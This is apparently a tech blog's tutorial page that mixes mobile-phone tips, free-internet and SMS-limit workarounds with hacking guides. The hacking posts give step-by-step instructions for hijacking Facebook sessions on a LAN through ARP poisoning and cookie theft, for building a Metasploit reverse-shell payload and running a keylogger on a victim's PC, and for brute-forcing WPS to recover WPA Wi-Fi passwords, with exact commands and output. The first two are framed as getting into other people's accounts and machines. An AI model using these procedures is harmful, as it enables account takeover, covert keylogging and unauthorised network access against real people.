Welcome to the tech blog copacopi

Showing posts with label TUTORIALS. Show all posts
Showing posts with label TUTORIALS. Show all posts

Send Unlimited Sms From Airtel-Get Rid To TRAI Rule 2012


Send Unlimited Sms From Airtel-Get Rid To TRAI Rule



Hi friends,Are you frustrated with ''TRAI'' rule.From some previous month Trai says that the mobile user send only 100 sms a day.But after many outcry TRAI change its 100 sms a day to 200 sms a day.But still this is a trouble for many user.But i have a Airtel Sms Trick 2012.Now you can send unlimited sms a day from Airtel.Yeah now you can send free sms unlimited a day.Just read below how you can send free sms day on airtel.Please like us on Facebook and subscribe us Feedburner 






Send Unlimited Sms From Airtel-May 2012


Before going to post let me clear one thing that you can only send unlimited sms if you have internet enable phone.If you have Internet enable phone than don't worry about balance deduction

  1. First of all you have to packet data enable phone(internet enable)
  2. Go in you phone setting and do the 3rd step 
  3. Go to setting>connectivity>packet data>packet data connection
  4. Put packet data connection always ONLINE
  5. Now go to your phones's messaging setting option
  6. Go to messaging>message setting>text message>use packet data and put YES
  7. Taddaa!!! now send unlimited sms from Airtel 


Note:-This trick is working fine in Punjab.I don't know about another states.Please check in your state and give us your value able comments.Also i tried this trick in Nokia Mobile Phone.If you have any other mobile phone then also do above steps.The only thing is that the mobile option of your phone is change
Read More

Copy Your Friends Message Inbox To Your Mobile

Hello users
 
Now You Can Copy Your Friends Message Inbox In Your Mobile..
 

Just Follow Below Very Simple Steps:-

1. Turn on your and your Friends bluetooth.
2. Go To Settings>sync and backup>phone switch>copy to this. 
3. Where They Ask to Select other device, Then Select new phone
4. Now You Can See List Which Item You Want To Select Mark It. You can also copy  MMS,NOTE,Contacts.
 5. Press Done And Search the device. Connect with it.

 Done.
Your Friend Inbox Copied Succesfully..
Enjoy And Use This Trick With Your Friends..
 
Please Give Your Valuable Comments Below..
Friend's Don't Forget To Like Us On Facebook.
Read More

How to hack Facebook via Sniffing ?

How to hack Facebook via Sniffing ?
How to hack Facebook via Sniffing?

Hi all users, after receiving your mails that most of facebook hacks doesn't work anymore we have searched and tested and posted some of most popular facebook hacking techniques but still  I think doesn't work for you so finally we've found this technique working 100% for hacking facebook and today we're here to let you know how to do it. So you want to hack Facebook, eh? Before we begin learning how to sniff and start ARP poisoning, let's first begin with this: this tutorial was designed for educational purposes--only! I take no responsibility in whatever damage this may cause to those who wish to participate in this act of hacking! That being said, if you still wish to continue in learning how to get into someone's Facebook without them knowing, proceed along.

There are a couple of terms you will have to know before we begin. This is so that you don't find yourself scratching your head midway through this post wondering what the @$%# I'm talking about. Please understand the following terms and they're respective definitions before proceeding.


  • Cookie:  A cookie is just one or more pieces of information stored as text strings on your machine. A Web server sends you a cookie and the browser stores it. The browser then returns the cookie to the server the next time the page is referenced. Cookies are essentially utilized so that the website can remember certain aspects of that particular website so that when you return it loads the page faster.
  • ARP Spoofing/Poisoning:  ARP stands for Address Resolution Protocol and is a telecommunications protocol used for resolution of network layer addresses into link layer addresses, a critical function in multiple-access networks. It's the "guy" behind the scenes that stands in the middle of all the network traffic, takes in the requests of other computers on the LAN, and returns valuable information/answers. How do you think you get your IP address when you look up ipconfig in CMD? Your computer sends out a request to extract its IP address and the ARP essentially gives you the IP address for your computer. The act of "spoofing" or "poisoning" the ARP, as you probably can already tell, is a very dangerous protocol. By doing so, you are enacting what's called a "man-in-the-middle-attack", MITM for short. When you poison the ARP of a computer within a LAN, you are making yourself the ARP. In other words, all the requests the computers in the network make come directly to you and the answers go directly from you. More on this later.
  • Packet(s): Packet, or packets, are a formatted unit of data carried by a packet mode computer network. They contain literally a million variety of information and provide useful methods in transmitting/receiving requested information. For example, let's take a look at sending an email. On the Internet, the network breaks an e-mail message into parts of a certain size in bytes. These are the packets. Each packet carries the information that will help it get to its destination -- the sender's IP address, the intended receiver's IP address, something that tells the network how many packets this e-mail message has been broken into and the number of this particular packet. The packets carry the data in the protocols that the Internet uses: Transmission Control Protocol/Internet Protocol (TCP/IP). Each packet contains part of the body of your message. Hopefully this gives you a general idea of how packets work and what they provide for both your computer and the internet.
  • Sniffing: Sniffing is usually implied to sniffing network packets. Packet sniffing is the act of eavesdropping on another computer's packet transfer and capturing (saving) those packet transfers for analysis. Though this sounds malicious and wrong, packet sniffing is used widely around the world today for a number of beneficial reasons. But yes, you are correct, just like everything else there are both good and bad intentions for sniffing. An analysis of "sniffed" packets can often times to be used to pick out abusive/malicious acts within a network. An analysis can also provide the "sniffer" to pick out what the slave has been doing and what kind of information the slave's computer has been sending/receiving. Again, just a general definition but you get the picture.
Please read through the definitions and familiarize yourself with the terms before asking what certain things mean here. You can't expect to know every and anything without doing some homework. Trust me, knowing these terms will not only save you time but also give you the benefit of becoming more knowledgeable about basic network definitions Victoire

Software

The following is a comprehensive list of the software you will be needing for this practice. I've given the links to their home pages where you can download the software for free.


Sniffing Your Way In

Now that you're generally familiar with some basic network definitions and have downloaded the required tools to effectively sniff packets, let us begin. Go ahead and open up Firefox and log into your Facebook account. You should be able to see the "cookies" option in the upper-left corner of the toolbar. Click on that and select "View Cookie Information".

You should now see a collective group of information all in regards to the cookies saved on your computer for Facebook. The main cookies are the c_user cookie (which identifies a person uniquely) and datr cookie (which contains important information for the specified c_user). Our goal in sniffing into someone else's Facebook is to trick the browser and the computer into thinking that we are someone else. How do we do this? By manipulating cookies to disguise ourselves. Essentially we are swapping our actual Facebook cookies to that of the slave's so that when we log back into Facebook, it will think we are the slave rather than ourselves. Not too hard to understand, right? Blink

Go ahead and close out of Firefox for now. Next, go and install Cain and Abel. Throughout the installation process, the setup wizard will ask if you want to install the packet driver WinPCap--go ahead and install this. Once you have successfully installed Cain and Abel, open the program. Now follow these steps exactly:
  • Click on configure on top and select your Network card. Mostly its the one with an IP address Tongue.
  • Next click on the start/stop sniffer on top as shown below in green square.
  • Once you start the sniffer, goto the sniffer tab in Cain, right-click and click scan MAC address as shown below!


Depending on your computer and your network population this process can take a couple of minutes. Once it's complete, however, you should be able to pull up a list of computers on your LAN. One cool thing you can do here is right-click one of the computers and find out the computer name. Now it's time for the attack! What was the name of the attack again? Anyone? Did you forget already? Ah, yes, the MITM attack!

Again, follow these steps accurately to effectively spoof the ARP :

  • First Click the APR tab below in cain.
  • Click the white screen in the top frame
  • Click the blue plus on top.


You should get a list of all the devices on the left and a blank screen on the right. In the left screen you should select the router IP. And in the right box, select the computers you want to target. To be safe its better to target one computer. But if you want some real fun then select all the computers on the right frame Hehe. Press "Ok". A caveat in selecting a large amount of computers, however, is that your computer may not be able to handle all the network transmissions and therefore lose some packet captures. Also keep in mind, however, that if someone is working in the router or is monitoring/analyzing the router and actually knows what he/she is doing, they could immediately detect that you are ARP poisoning the router. So be careful! You can get caught.

All the computers should have populated the top-frame. Now select the whole list and click on the nuclear button (top left of Cain, bolded box in the picture below).
And you're done! You've successfully poisoned the ARP of the computers you've selected and you are now the "middle-man" between your slave's computer and the router to the internet. But wait just a second--we can't get into the slave's Facebook just yet! All we've done so far is established ourselves to be the "middle-man". We have to now capture some packets, swap cookies, and voila! We're in.

Now we will open up Wireshark. Follow the steps below :

  • Open up wireshark
  • Go to "Capture –> Interfaces" in the top menu and select your interface. It’s usually the one which has an IP address and a certain number of packets flowing through it.
  • Next go to "Capture" and click on "Start".  
It should look something like this.
This window has all the packets sent from the slave’s/victims’ computer to the router and all the packets sent from the router to the slave.

Next in the filter type “http.cookie contains datr”. You ask why? Because, when a user logs in to facebook, he is given some cookies which is unique to him. If we replace our cookies with the slave’s cookies, we can login to his account as then facebook wont know the difference.

 
After filtering the cookies out, right-click on any one of them and click on "Follow TCP Stream".


In the TCP stream look for the line "Cookie: ( and all cookie names)". If it doesn't show up, select some other packet in Wireshark and click on "Follow TCP Stream" for that particular cookie. You can see the source IP and destination IP in Wireshark. So if you have more than one source IP, then you know you have the cookies of more than one account on your LAN. This is what I got when I did it.

 
You now have the slave's cookies for his/her Facebook. The main ones we need to focus on are the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie. Now open up Firefox and go to Facebook. If you're logged in, log out so that you're at Facebook's home page. Click on the "Cookie" option in the toolbar (as like before) and do the following in this exact order. 
  • Clear session cookies.
  • Delete domain cookies.
  • Delete patch cookies.
Note :-
If you don't do the steps in that same order, this will not work!

Note :- Once you do this, reload the Facebook page (http://www.facebook.com). This is to ensure that you are loading the Facebook page clean without any pre-existing cookies.

Now login to your account with your username and password. After logging in, click on cookies in web developer add-on just like before and click on “View Cookie Information”. You should see all of your Facebook cookies now. Any ideas what we do next? I suspect you know by nowOui.

Click on “Edit Cookie” for each cookies there and replace the cookie value with the value you got through Wireshark. If you didn't get all the cookies in Wireshark, it's OK! But mainly, you should look to replace the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie.
After you have swapped cookies, go ahead and refresh the page. Voila! You should now be logged in as your slave rather than yourself. Congratulations, you have successfully "hacked" your way into someone else's Facebook! Again, please keep in mind that this only works for computers within your LAN. So if you're at home, you can only get into the Facebook of people who are connected at home. No, you cannot hack into the Facebook of someone across the worldNon.

I hope you guys have enjoyed this tutorial! Please feel free to leave me any questions below or PM me with any issues you have. I'll try to respond and reply at my soonest convenience.
If you liked this tutorial then +1 us on google+ and like our facebook fan page to get latest updates like this!
Read More

Metasploit Tutorial - With an example | Exploiting the vulnerabilities

--- The Metasploit Framework ---


Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.
Payload: Actual code which runs on the compromised system after exploitation
Now, what Metasploit IS?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.
I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.
For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.

The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.


Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps

Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv
Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R
P.S.: The above information is just for educational purposes only. You should test it against the computer you own.
Read More

Airtel Gprs Tricks 2012_New Airtel Working Tricks March 2012



Hello Crackohack Readers!

Working Airtel Free Gprs Tricks For March 2012.These Tricks Are Working 100% In This March.All Are Old Tricks But Still Working With Good Speed And Resume Supported Facility.Check Out These Tricks Guys.

Working Airtel Free Gprs Tricks With Proxies:

These Proxy Tricks Are Working Now And Gives Over 6-10Kbps In Mobile 2G.Also Working On 3G with speed upto 3mbps.

Airtel Working Proxy 1 :

This Is An Old Trick But Still Its Working With Good Speed.

Apn: airtelgprs.com

Proxy: 96.31.65.82

Port: 80

Home Page: fb.me (or) live.airtelworld.com

Downloading Is Awesome And Its Working With Great Speed For Surfing.Resume Supported

Airtel Working Proxy 2 :

This Proxy Is Working 100% With Highspeed Ans Also Resume Supportable.

Apn : Airtelgprs.com

Proxy : 216.155.153.105

Port : 80

Home Page: fb.me (or) live.airtelworld.com

This Trick Is Working In Both Mobile And PC.It Gives Over 30Kbps In Airtel 3G.10-12Kbps In Airtel 2G.

And One More Special Trick For Freetrickz Readers.If Opera Mini Or Ucweb Handlers Are Not Working For You?

Then Don't Worry Freetrickz Is Here For 100% Solutions

Try This Trick.This Trick Is Working For Me 100% In Tamilnadu.

Working Airtel Opera Mini Handler Trick:

Trick 1:

Download Opera Mini Handler From HERE

Set Mobile Office Settings As Default In Your Mobile

Then Run Opera Mini Handler

Scroll Down

Choose "Host" As Proxy Type

Then Put "Fb.me (or) live.airtelworld.com" In Proxy Server

Then Save The Configuration And Press Ok

--This Trick Is Working 100% .So Try This Out...

Trick 2:

Create A New Manual Configuration In Mobile

Then Set Proxy As "server4.operamini.com"

Then Set Port As "80"

Then Open Handler And Scroll Down

Then Set "Http" As Proxy Type

Put Proxy Server As "live.airtelworld.com"

Then Save Config.

And Run Opera Mini

Read More

MULTI-TASKING IN NOKIA S40 PHONES(TUTORIAL).


Friends you all know about the mobile phone giant Nokia.It is one among the renowned mobile phone manufacturers,Nokia’s series 40 phones are very popular because of its low cost and high efficiency,but these are not smartphones which are used to do heavy computing,rather this are just an jvm(java virtual machine) based mobiles used as multimedia phones,but it is not at all designed for multitasking but now our s40 geeks found an new way for multitasking with least effects on your phone,I’ll tell you how.

S40 hacking

security system of s40 phones are designed in such a way that for every single change the phone will ask the user to give permission,sometimes its very annoying while using unsigned application so you need to hack phones security,
to hack phones security you need J.A.F software and a computer,I’ll explain the procedure in steps.
step 1:
install j.a.f and run it through Pkey,now connect your phone,goto “BB5″ column,and tick “read pp” button and hit service

now you will get pp file of your phone and save it,now open that file with any text editors such as notepad,word-pad, or notepad++.now you must be some what careful here,

for s40 v3 phones change the value of 28th line to 2 from 1,that is “28 2″
for s40 v5 and v6 phones change the value of 48th line to 2,that is “48 2″

some phones show only three fields on their pp file,then just add 48 2 below set 1 like this
step 2:
now tick upload pp then hit service button,your phone will now go into test mode an pop window will come and select the edited pp,J.A.F will upload pp file to your phone,and phone will restart automatically,that’s it now you hacked your phones security.

Multitasking

After you hacked you phones security then take the application you want to minimize ,then extract that jar file to a folder then modify “manifest.mf” file of that jar file,it is found inside manifest folder,then add this code at very last line of the manifest.mf file
Nokia-MIDlet-no-exit: True
make sure that ‘MID’ in above code are in capitals,

now repack that jar file and install it in your mobile,then just run the application now just press red button the application will not ask you to exit this time rather it disappears(minimizes),click on the application again to restore it.
multitasking works only with s40 v5 and higher phones,but you can hack security of any s40 phones
Read More

How To Speed Up The S60 Device


Hello Users, Do you have a nokia s6o phone then there is good news for you ,This time I'm going to share a trick about how to speed up your S60 device.
This trick 100% works.tested so many times.

To do this trick first of all you have to Change your phones’ date to the 10 .08 .2007
Go to the calendar
Now we need to create two new to-do’s ( Options > New entry > To-do )
These two to-do’s need to have the following information :
do :
• Subject : Speed
• Due date : 10 .07 .2007
• Priority : High
do :
• Subject : Qoukie
• Due date : 10 .06 .2007
• Priority : Low
Confirm the both to-do notes with “Done” , but don’t close the calendar application .
Choose : Options > To-do view
Mark “Speed” as done , after
that mark “Qoukie” as done .
Now you can close the calendar .
Change the phones’ date back to the actual day .
Thst's it.Now enjoy faster nokia s60 user interface!!
Read More

How to Crack a Wi-Fi Network’s WPA Password with Reaver

 How to Crack a Wi-Fi Network's WPA Password with ReaverYour Wi-Fi network is your conveniently wireless gateway to the internet, and since you're not keen on sharing your connection with any old hooligan who happens to be walking past your home, you secure your network with a password, right? Knowing, as you might, how easy it is to crack a WEP password, you probably secure your network using the more bulletproof WPA security protocol.
Here's the bad news: A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. Here's how to crack a WPA or WPA2 password, step by step, with Reaver—and how to protect your network against Reaver attacks.
In the first section of this post, I'll walk through the steps required to crack a WPA password using Reaver. You can follow along with either the video or the text below. After that, I'll explain how Reaver works, and what you can do to protect your network against Reaver attacks.

First, a quick note: As we remind often remind readers when we discuss topics that appear potentially malicious: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing.
how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise. The more you know, the better you can protect yourself.

What You'll Need

You don't have to be a networking wizard to use Reaver, the command-line tool that does the heavy lifting, and if you've got a blank DVD, a computer with compatible Wi-Fi, and a few hours on your hands, you've got basically all you'll need. There are a number of ways you could set up Reaver, but here are the specific requirements for this guide:
  • How to Crack a Wi-Fi Network's WPA Password with ReaverThe BackTrack 5 Live DVD. BackTrack is a bootable Linux distribution that's filled to the brim with network testing tools, and while it's not strictly required to use Reaver, it's the easiest approach for most users. Download the Live DVD from BackTrack's download page and burn it to a DVD. You can alternately download a virtual machine image if you're using VMware, but if you don't know what VMware is, just stick with the Live DVD. As of this writing, that means you should select BackTrack 5 R1 from the Release drop-down, select Gnome, 32- or 64-bit depending on your CPU (if you don't know which you have, 32 is a safe bet), ISO for image, and then download the ISO.
  • A computer with Wi-Fi and a DVD drive. BackTrack will work with the wireless card on most laptops, so chances are your laptop will work fine. However, BackTrack doesn't have a full compatibility list, so no guarantees. You'll also need a DVD drive, since that's how you'll boot into BackTrack. I used a six-year-old MacBook Pro.
  • A nearby WPA-secured Wi-Fi network. Technically, it will need to be a network using WPA security with the WPS feature enabled. I'll explain in more detail in the "How Reaver Works" section how WPS creates the security hole that makes WPA cracking possible.
  • A little patience. This is a 4-step process, and while it's not terribly difficult to crack a WPA password with Reaver, it's a brute-force attack, which means your computer will be testing a number of different combinations of cracks on your router before it finds the right one. When I tested it, Reaver took roughly 2.5 hours to successfully crack my password. The Reaver home page suggests it can take anywhere from 4-10 hours. Your mileage may vary.

Let's Get Crackin'

At this point you should have BackTrack burned to a DVD, and you should have your laptop handy.

Step 1: Boot into BackTrack

How to Crack a Wi-Fi Network's WPA Password with ReaverTo boot into BackTrack, just put the DVD in your drive and boot your machine from the disc. (Google around if you don't know anything about live CDs/DVDs and need help with this part.) During the boot process, BackTrack will prompt you to to choose the boot mode. Select "BackTrack Text - Default Boot Text Mode" and press Enter.
Eventually BackTrack will boot to a command line prompt. When you've reached the prompt, type startx and press Enter. BackTrack will boot into its graphical interface.

Step 2: Install Reaver

Reaver has been added to the bleeding edge version of BackTrack, but it's not yet incorporated with the live DVD, so as of this writing, you need to install Reaver before proceeding. (Eventually, Reaver will simply be incorporated with BackTrack by default.) To install Reaver, you'll first need to connect to a Wi-Fi network that you have the password to.
  1. Click Applications > Internet > Wicd Network Manager
  2. Select your network and click Connect, enter your password if necessary, click OK, and then click Connect a second time.
Now that you're online, let's install Reaver. Click the Terminal button in the menu bar (or click Applications > Accessories > Terminal). At the prompt, type:
 apt-get update 
And then, after the update completes:
 apt-get install reaver 
How to Crack a Wi-Fi Network's WPA Password with ReaverIf all went well, Reaver should now be installed. It may seem a little lame that you need to connect to a network to do this, but it will remain installed until you reboot your computer. At this point, go ahead and disconnect from the network by opening Wicd Network Manager again and clicking Disconnect. (You may not strictly need to do this. I did just because it felt like I was somehow cheating if I were already connected to a network.)

Step 3: Gather Your Device Information, Prep Your Crackin'

In order to use Reaver, you need to get your wireless card's interface name, the BSSID of the router you're attempting to crack (the BSSID is a unique series of letters and numbers that identifies a router), and you need to make sure your wireless card is in monitor mode. So let's do all that.
Find your wireless card: Inside Terminal, type:
 iwconfig 
How to Crack a Wi-Fi Network's WPA Password with ReaverPress Enter. You should see a wireless device in the subsequent list. Most likely, it'll be named wlan0, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different.
Put your wireless card into monitor mode: Assuming your wireless card's interface name is wlan0, execute the following command to put your wireless card into monitor mode:
 airmon-ng start wlan0 
This command will output the name of monitor mode interface, which you'll also want to make note of. Most likely, it'll be mon0, like in the screenshot below. Make note of that.
Find the BSSID of the router you want to crack: Lastly, you need to get the unique identifier of the router you're attempting to crack so that you can point Reaver in the right direction. To do this, execute the following command:
 airodump-ng wlan0 
(Note: If airodump-ng wlan0 doesn't work for you, you may want to try the monitor interface instead—e.g., airodump-ng mon0.)
You'll see a list of the wireless networks in range—it'll look something like the screenshot below:
When you see the network you want, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (it's the series of letters, numbers, and colons on the far left). The network should have WPA or WPA2 listed under the ENC column.
Now, with the BSSID and monitor interface name in hand, you've got everything you need to start up Reaver.

Step 4: Crack a Network's WPA Password with Reaver

Now execute the following command in the Terminal, replacing bssid and moninterface with the BSSID and monitor interface and you copied down above:
 reaver -i moninterface -b bssid -vv 
For example, if your monitor interface was mon0 like mine, and your BSSID was 8D:AE:9D:65:1F:B2 (a BSSID I just made up), your command would look like:
 reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv 
Press Enter, sit back, and let Reaver work its disturbing magic. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my successful test, Reaver took 2 hours and 30 minutes to crack the network and deliver me with the correct password. As mentioned above, the Reaver documentation says it can take between 4 and 10 hours, so it could take more or less time than I experienced, depending. When Reaver's cracking has completed, it'll look like this:
A few important factors to consider: Reaver worked exactly as advertised in my test, but it won't necessarily work on all routers (see more below). Also, the router you're cracking needs to have a relatively strong signal, so if you're hardly in range of a router, you'll likely experience problems, and Reaver may not work. Throughout the process, Reaver would sometimes experience a timeout, sometimes get locked in a loop trying the same PIN repeatedly, and so on. I just let it keep on running, and kept it close to the router, and eventually it worked its way through.
Also of note, you can also pause your progress at any time by pressing Ctrl+C while Reaver is running. This will quit the process, but Reaver will save any progress so that next time you run the command, you can pick up where you left off-as long as you don't shut down your computer (which, if you're running off a live DVD, will reset everything).

How Reaver Works

Now that you've seen how to use Reaver, let's take a quick overview of how Reaver works. The tool takes advantage of a vulnerability in something called Wi-Fi Protected Setup, or WPS. It's a feature that exists on many routers, intended to provide an easy setup process, and it's tied to a PIN that's hard-coded into the device. Reaver exploits a flaw in these PINs; the result is that, with enough time, it can reveal your WPA or WPA2 password.
Read more details about the vulnerability at Sean Gallagher's excellent post on Ars Technica.

How to Protect Yourself Against Reaver Attacks

Since the vulnerability lies in the implementation of WPS, your network should be safe if you can simply turn off WPS (or, even better, if your router doesn't support it in the first place). Unfortunately, as Gallagher points out as Ars, even with WPS manually turned off through his router's settings, Reaver was still able to crack his password.
 Special thanks to life hacker

Read More

Turn you RAM into a Graphic card

  • WHILE URFING WEB WE COME ACROSS A TOOL WHICH CAN BE USED TO EMULATE GRAPHIC CARD ON THE RAM OF PC
    Play latest Games without Graphic Cards
  • Many times we are stuck up with a system that just doesn’t provide enough juice to run the latest game…the result being-
  • You either spend a pot of money (atleast Rupees 3500 or 70$) for getting the latest graphics card
  • Or you just read reviews of games like Crysis , Far Cry on gamespot and feel like a noob,fully knowing that your system just won’t be able to support it….
  • Take heart ! Here’s a wicked software with which you can beat 128-256 MB of graphics card requirements with a very modest 1GB DDR2 RAM.-Download
  • What it does is,it uses a part of your RAM as Graphics card memory. For example,if you got 1GB DDR2 RAM,then it’ll use 128MB of it as a Virtual Graphics card,and the remaining 896MB will be used as a regular RAM.
  • Cool right….so you can Virtually emulate NVIDIA GeForce TI 4600,NVIDIA GeForce FX 4900 ULTRA,ATi Radeon 8500, ATi Radeon 9800 PRO
Download- DOWNLOAD THIS TOOL
Read More

Trick to Increase your Utorrent speed by 80%

 Increase your Utorrent speed by 80%

Lets get started. If you dont have Utorrent, Download it from here


Remember to increase torrent speed please disable firewall before you use it. Now Open it up and follow these screenshots tutorial:

 
 
 For connection setting I Here checked enable upnp port mapping, enable NAT-PMP port mapping and i use 45682 for random port.
 
Checked use additional upload slots if upload speed <90% and follow the value setting like screenshot.
Checked for enable dht network, enable dht for new torrent, enable local peer discovery, ask tracker for scrape information, enable peer change, allow incoming legacy connections and enable outgoing protocol encryption.

Setup net.max_halfopen to 90



That is it, You have just tweaked the speed of Utorrent by 80%
Remember, If the torrent has no seeds, This will not work!
Enjoy....... 
Read More

© Copacopi, AllRightsReserved.